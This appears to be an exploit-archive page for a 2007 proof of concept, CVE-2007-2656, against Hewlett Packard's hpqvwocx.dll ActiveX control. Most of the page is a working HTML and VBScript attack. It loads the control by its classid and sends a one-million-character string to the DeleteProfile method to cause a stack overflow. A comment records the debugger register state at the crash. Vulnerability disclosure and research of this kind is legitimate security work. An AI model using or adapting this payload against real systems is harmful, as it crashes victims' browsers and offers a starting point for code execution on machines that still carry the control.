Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)



EKU-ID: 11862 CVE: OSVDB-37787;CVE-2007-2656 OSVDB-ID:
Author: callAX Published: 2007-05-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


<html>

<head>

 <title>

  Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309

 </title>

</head>



<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>

Tested in Windows XP Service Pack 2<br>

Discovered by Goodfellas Security Research Team<br>

Url ->http://www.hp.com<br> author -> callAX<br>mail -> callax@shellcode.com.ar<br>

http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>



<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>



<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">



<script language="VBScript">



sub OuCh()



 Var_0 = String(1000000, "A")



 pAF.DeleteProfile Var_0



End Sub





</script>



</html>



<!--



Tested in OllyDBG 1.08b



TEST DWORD PTR DS:[ECX],EAX



EAX -> 000ED484

ECX -> 000425F4

EDX -> 00000000

EBX -> 00000000

EIP  -> 04B47B97



Sub DeleteProfile (

            ByVal Name  As String

)



-->

# milw0rm.com [2007-05-11]